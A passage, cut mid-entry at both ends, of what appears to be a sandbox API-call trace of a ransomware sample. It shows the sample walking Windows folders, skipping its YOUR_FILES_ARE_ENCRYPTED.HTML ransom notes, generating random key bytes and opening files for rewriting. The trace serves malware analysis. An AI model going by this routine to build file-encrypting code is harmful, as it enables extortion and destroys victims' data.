ftLastAccessTime.dwLowDateTime=0x1137e43c, ftLastAccessTime.dwHighDateTime=0x1c9ea14, ftLastWriteTime.dwLowDateTime=0x1137e43c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x3473, dwReserved0=0x0, dwReserved1=0x60, cFileName="tasks.xml", cAlternateFileName="")) returned 1 [0169.813] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: 
pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml") returned 99 [0169.813] lstrcmpW (lpString1="tasks.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.813] PathFindExtensionW (pszPath="tasks.xml") returned=".xml" [0169.813] lstrlenW (lpString=".xml") returned 4 [0169.813] PathFindExtensionW (pszPath="tasks.xml") returned=".xml" [0169.813] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0169.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\tasks.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.814] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64855184, ftCreationTime.dwHighDateTime=0x1ca0409, ftLastAccessTime.dwLowDateTime=0x64855184, ftLastAccessTime.dwHighDateTime=0x1ca0409, ftLastWriteTime.dwLowDateTime=0x1137e43c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x1b9f4, dwReserved0=0x0, dwReserved1=0x60, cFileName="wmp.ico", cAlternateFileName="")) returned 1 [0169.814] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\wmp.ico") returned 97 [0169.814] lstrcmpW (lpString1="wmp.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.814] PathFindExtensionW (pszPath="wmp.ico") returned=".ico" [0169.814] lstrlenW (lpString=".ico") returned 4 [0169.814] PathFindExtensionW (pszPath="wmp.ico") returned=".ico" [0169.814] 
FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbaf3a20, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbaf3a20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaf3a20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.814] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0169.814] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.814] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbaf3a20, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbaf3a20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaf3a20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.814] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0169.814] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0169.814] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\device 
stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.814] GetProcessHeap () returned 0x270000 [0169.815] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73f0050 | out: hHeap=0x270000) returned 1 [0169.856] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9ebda38, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="{e35be42d-f742-4d96-a50a-1775fb1a7a42}", cAlternateFileName="{E35BE~1")) returned 1 [0169.856] wnsprintfW (in: pszDest=0x73e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned 89 [0169.856] GetProcessHeap () returned 0x270000 [0169.856] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73f0050 [0169.856] lstrcpyW (in: lpString1=0x73f0050, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}" [0169.856] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*") returned="\\\\?\\C:\\Users\\All 
Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*" [0169.856] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9ebda38, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0169.857] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf9ebda38, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.857] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcbaf3a20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaf3a20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="en-US", cAlternateFileName="")) returned 1 [0169.857] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned 95 [0169.857] GetProcessHeap () returned 0x270000 [0169.857] RtlAllocateHeap 
(HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75e0048 [0169.857] lstrcpyW (in: lpString1=0x75e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US" [0169.857] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*" [0169.857] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcbaf3a20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaf3a20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0169.857] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x917f121e, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0xcbaf3a20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbaf3a20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) 
returned 1 [0169.858] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x84f5f4ea, ftCreationTime.dwHighDateTime=0x1cbf8b7, ftLastAccessTime.dwLowDateTime=0x852ccb00, ftLastAccessTime.dwHighDateTime=0x1cbf8b7, ftLastWriteTime.dwLowDateTime=0x84f5f4ea, ftLastWriteTime.dwHighDateTime=0x1cbf8b7, nFileSizeHigh=0x0, nFileSizeLow=0x5e8, dwReserved0=0x0, dwReserved1=0x60, cFileName="resource.xml", cAlternateFileName="")) returned 1 [0169.858] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml") returned 108 [0169.858] lstrcmpW (lpString1="resource.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.858] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0169.858] lstrlenW (lpString=".xml") returned 4 [0169.858] PathFindExtensionW (pszPath="resource.xml") returned=".xml" [0169.858] SystemFunction036 (in: RandomBuffer=0x4ebd1d4, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd1d4) returned 1 [0169.858] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\resource.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\resource.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.858] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbaf3a20, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbaf3a20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, 
ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.858] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0169.858] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.858] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbaf3a20, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbaf3a20, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.858] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0169.859] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0169.859] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-US\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\en-us\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.859] GetProcessHeap () returned 0x270000 [0169.860] 
HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75e0048 | out: hHeap=0x270000) returned 1 [0169.860] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa84024fc, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa84024fc, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d8ea4dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xd0a3, dwReserved0=0x0, dwReserved1=0x60, cFileName="folder.ico", cAlternateFileName="")) returned 1 [0169.860] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico") returned 100 [0169.860] lstrcmpW (lpString1="folder.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.860] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0169.860] lstrlenW (lpString=".ico") returned 4 [0169.860] PathFindExtensionW (pszPath="folder.ico") returned=".ico" [0169.860] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8343e21, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa8343e21, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d8ea4dc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xe3c8, dwReserved0=0x0, dwReserved1=0x60, cFileName="print_pref.ico", cAlternateFileName="")) returned 1 [0169.860] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico") returned 104 [0169.860] lstrcmpW (lpString1="print_pref.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.860] PathFindExtensionW 
(pszPath="print_pref.ico") returned=".ico" [0169.860] lstrlenW (lpString=".ico") returned 4 [0169.860] PathFindExtensionW (pszPath="print_pref.ico") returned=".ico" [0169.860] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8369f80, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa8369f80, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d91063c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xebb8, dwReserved0=0x0, dwReserved1=0x60, cFileName="print_property.ico", cAlternateFileName="")) returned 1 [0169.860] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico") returned 108 [0169.860] lstrcmpW (lpString1="print_property.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.860] PathFindExtensionW (pszPath="print_property.ico") returned=".ico" [0169.860] lstrlenW (lpString=".ico") returned 4 [0169.860] PathFindExtensionW (pszPath="print_property.ico") returned=".ico" [0169.860] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa83b623e, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa83b623e, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d91063c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xdff5, dwReserved0=0x0, dwReserved1=0x60, cFileName="print_queue.ico", cAlternateFileName="")) returned 1 [0169.860] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico") returned 105 [0169.860] lstrcmpW 
(lpString1="print_queue.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.861] PathFindExtensionW (pszPath="print_queue.ico") returned=".ico" [0169.861] lstrlenW (lpString=".ico") returned 4 [0169.861] PathFindExtensionW (pszPath="print_queue.ico") returned=".ico" [0169.861] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa83b623e, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa83b623e, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d9a8bbc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xec75, dwReserved0=0x0, dwReserved1=0x60, cFileName="scan_.ico", cAlternateFileName="")) returned 1 [0169.861] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico") returned 99 [0169.861] lstrcmpW (lpString1="scan_.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.861] PathFindExtensionW (pszPath="scan_.ico") returned=".ico" [0169.861] lstrlenW (lpString=".ico") returned 4 [0169.861] PathFindExtensionW (pszPath="scan_.ico") returned=".ico" [0169.861] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa84024fc, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa84024fc, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d9a8bbc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x10654, dwReserved0=0x0, dwReserved1=0x60, cFileName="scan_property.ico", cAlternateFileName="")) returned 1 [0169.861] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device 
Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_property.ico") returned 107 [0169.861] lstrcmpW (lpString1="scan_property.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.861] PathFindExtensionW (pszPath="scan_property.ico") returned=".ico" [0169.861] lstrlenW (lpString=".ico") returned 4 [0169.861] PathFindExtensionW (pszPath="scan_property.ico") returned=".ico" [0169.861] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa83dc39d, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa83dc39d, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1d9a8bbc, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0xf8c2, dwReserved0=0x0, dwReserved1=0x60, cFileName="scan_settings.ico", cAlternateFileName="")) returned 1 [0169.861] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico") returned 107 [0169.861] lstrcmpW (lpString1="scan_settings.ico", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.861] PathFindExtensionW (pszPath="scan_settings.ico") returned=".ico" [0169.861] lstrlenW (lpString=".ico") returned 4 [0169.861] PathFindExtensionW (pszPath="scan_settings.ico") returned=".ico" [0169.861] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8213329, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0xa8213329, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0x1daff81c, ftLastWriteTime.dwHighDateTime=0x1c9ea14, nFileSizeHigh=0x0, nFileSizeLow=0x2c64, dwReserved0=0x0, dwReserved1=0x60, cFileName="tasks.xml", cAlternateFileName="")) returned 1 [0169.861] wnsprintfW (in: 
pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml") returned 99 [0169.862] lstrcmpW (lpString1="tasks.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.862] PathFindExtensionW (pszPath="tasks.xml") returned=".xml" [0169.862] lstrlenW (lpString=".xml") returned 4 [0169.862] PathFindExtensionW (pszPath="tasks.xml") returned=".xml" [0169.862] SystemFunction036 (in: RandomBuffer=0x4ebd4e0, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd4e0) returned 1 [0169.862] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.862] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcbb19b80, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbb19b80, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbb19b80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.862] wnsprintfW (in: pszDest=0x73f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0169.862] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.862] FindNextFileW (in: hFindFile=0x42f3200, 
